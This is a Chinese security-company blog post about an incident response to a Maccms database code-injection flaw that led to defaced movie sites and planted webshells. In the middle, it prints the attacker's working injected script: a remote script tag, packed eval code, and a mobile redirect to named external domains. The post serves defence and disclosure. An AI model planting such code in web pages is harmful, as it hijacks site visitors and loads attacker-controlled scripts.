专栏首页网站漏洞修复苹果maccms最新漏洞补丁 防止数据库被反复挂马

苹果maccms最新漏洞补丁 防止数据库被反复挂马

2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们SINE安全寻求技术上支持,防止网站被挂马。根据客户的反应,服务器采用的是linux centos系统,苹果CMS版本是最新的V10版本,我们立即成立网站安全应急响应处理,帮助客户解决网站被攻击的问题。

首先很多站长以为升级了苹果CMS官方最新的漏洞补丁就没问题了,通过我们SINE安全技术对补丁的代码安全分析发现,该漏洞补丁对当前的数据库代码执行漏洞是没有任何效果的,于事无补,网站还会继续被攻击。

我们来看下客户网站目前发生的挂马问题,打开网站首页以及各个电影地址都会被插入挂马代码,如下图所示:

打包压缩了一份网站源代码,以及nginx网站日志文件,我们SINE安全工程师在根目录下发现被上传了网站webshell木马文件,通过网站日志溯源追踪我们查看到访问这个PHP脚本木马文件的是一个韩国的IP,具体的代码如下图:

代码做了加密处理,我们SINE安全对其解密发现该代码的功能可以对网站进行上传,下载,修改代码,操作数据库等功能,属于PHP大马的范畴,也叫webshell木马文件,我们又对苹果CMS的源代码进行了人工安全审计,发现index.php代码对搜索模块上做的一些恶意代码过滤检查存在漏洞,可导致攻击者绕过安全过滤,直接将SQL插入代码执行到数据库当中去。

我们对数据库进行安全检测发现,在VOD表的d_name被批量植入了挂马代码:

<script src=https://www.kilin.xyz/1.js>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.kk="https://m.qiche-hangjia.com:168/ua80666/"',500)}

这手法很专业,不是一般的攻击者所为,针对手机端做了跳转以及隐藏嵌入,让网站运营者根本无法察觉发现,还判断了cookies来路,达到条件才能触发攻击者植入的广告代码。继续安全分析与追踪,发现了攻击者的手法,POST提交到/index.php?m=vod-search,POST内容是加密的这里就不方便发出了,属于漏洞攻击了,可能会给其他使用苹果CMS系统的网站造成攻击,我们SINE安全技术对POST攻击代码进行了解密分析,发现确实是绕过了苹果官方V8,V10系统的代码安全过滤,直接将挂马代码插入到了数据库里了。

问题根源找到了,接下来我们对客户的苹果CMS漏洞进行修复,对POST提交过来的参数进行严格的过滤与转义,对vod-search含有的恶意字符进行强制转换,对恶意代码进行安全拦截,防止传入到后端进行数据库里的代码执行。对网站代码里存在的木马后门进行了全面的人工审计与检查,共计发现5个后门,其余的在缓存目录当中,跟程序代码混淆在一起,也都删除了,对网站的后台地址进行了更改,之前后台使用的地址被攻击者掌握,对管理员的账号密码进行了加强,至此苹果CMS网站被挂马的问题才得以彻底解决,如果您的maccms也被一直挂马,自己懂代码的话可以对POST到index.php的数据进行安全拦截与检查,防止恶意代码的插入,如果不是太懂的话,建议找专业的网站安全公司来处理解决。

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Drupal 网站漏洞修复以及网站安全防护加固方法

    drupal是目前网站系统使用较多一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置,drupal的代码开发较为严谨,安全性较高,但是再...

    网站安全专家
  • 网站安全公司 实习学习经验感慨

    前几日,见到TSRC的小密圈里进行了一个“高手”主题活动,聊一聊刚入行后,你心中身旁的高手,刚见到主题活动的情况下哥哥去参加了。这里,再次整理一下,也衷心感谢聊...

    网站安全专家
  • 解决网站快照内容被篡改跳转被挂马的问题

    首先请各位网站运营者,检查下网站从百度点击进去,是否跳转到了恶意网站上了,直接输入网址则不会跳转的这个情况。再一个查看网站在百度里的首页快照是否是自身网站的内容...

    网站安全专家
  • 2020苹果cms木马最新漏洞补丁数据库被js挂马该如何解决

    2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被挂马,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导...

    技术分享达人
  • Drupal 网站漏洞修复以及网站安全防护加固方法

    drupal是目前网站系统使用较多一个开源PHP管理系统,架构使用的是php环境+mysql数据库的环境配置,drupal的代码开发较为严谨,安全性较高,但是再...

    网站安全专家
  • 产品研发做到又快又好的一个核心原则

    内容来源:2018 年 5 月 19 日,G7汇通天下技术合伙人廖强在“PHPCon China 2018 技术峰会”进行《敏捷工程实践与自动化》演讲分享。IT...

    IT大咖说
  • 新手程序员必须要知道的10个秘密

    初出茅庐的你带着仍残留墨香的毕业证书踏上工作岗位,马上就被书上没写的规则和各种繁杂的日常事务来了个下马威。这样的故事实在是司空见惯,编程工作也不例外。 没有几个...

    小小科
  • 【编程指导】新程序员必须具备的十个基本技能

    没有几个学生能100%为自己的第一份真正的工作做好准备。如果你不想成为其中之一,请学学以下这10项无需手把手指导就能学会的基本技能吧! 1、版本控制系统(VCS...

    程序员互动联盟
  • 如何从一名普通的程序员进阶成为一名优秀的程序员

    本文将讲述8种方式帮助你如何从一名普通的程序员进阶成为一名优秀的程序员,让我们就从此时此刻开始提高自己的开发技能吧。

    一墨编程学习
  • 新入行程序员应知的十个秘密

    初出茅庐的你带着仍残留墨香的毕业证书踏上工作岗位,马上就被书上没写的规则和各种繁杂的日常事务来了个下马威。这样的故事实在是司空见惯,编程工作也不例外。

    用户4962466

扫码关注云+社区

领取腾讯云代金券